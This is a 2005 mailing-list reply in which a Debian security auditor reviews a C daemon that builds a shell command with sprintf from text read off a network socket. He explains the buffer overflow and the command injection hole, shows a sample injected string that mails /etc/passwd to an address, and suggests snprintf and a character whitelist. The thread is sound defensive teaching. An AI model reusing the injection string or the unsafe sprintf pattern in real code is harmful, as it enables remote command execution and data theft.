Re: SOLVED: Daemon Programming
Yep, thats a good point, that I havent realized. The security stuff is
very very important.
I have to change the code to be able to manage this problems. This is
the next step.
Thanks for your advice ;-)
Sergio Cuellar Valdes
On Fri, 14 Jan 2005 03:58:44 +0000, Steve Kemp <firstname.lastname@example.org> wrote:
> On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cu?llar Vald?s wrote:
> > Marc, thanks that was the problem !!!
> > sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big
> > big big mistake
> It certainly was.
> > I added the hole path to the instructions:
> > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> > Thanks to all of you who helped me !! :-)
> You deamonize. You open a socket. You read input from that
> socket - carefully avoiding buffer overflows - then you run the
> /usr/local/bin/say -s 4 -a "the text you read"
> Firstly you don't avoid a simple buffer overflow. Although
> you have two buffers, 'buffer' for receiving the message from
> the network and 'message' for running the command are both the
> same size you don't account for the extra characters when you're
> sprintf(message, "say -s 4 -a \"%s\"", buffer);
> At least change that to:
> snprintf(message, sizeof(message) "say -s 4 -a \"%s\"", buffer);
> Secondly, and this is the biggie, you don't quote or process the
> characters which are read from the network.
> Consider what would happen if a malicious user sent this:
> "; cat /etc/passwd | mail email@example.com ; echo "
> You would run this commend:
> /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
> Effectively you're allowing any user who can connect to your server
> to execute arbitary commands. If this is started by init you're likely
> running as root too.
> Check that the characters you read from the network are only
> [a-zA-Z ] and you're probably OK.
> # The Debian Security Audit Project.
"Meine Hoffnung soll mich leiten
Durch die Tage ohne Dich
Und die Liebe soll mich tragen
Wenn der Schmerz die Hoffnung bricht"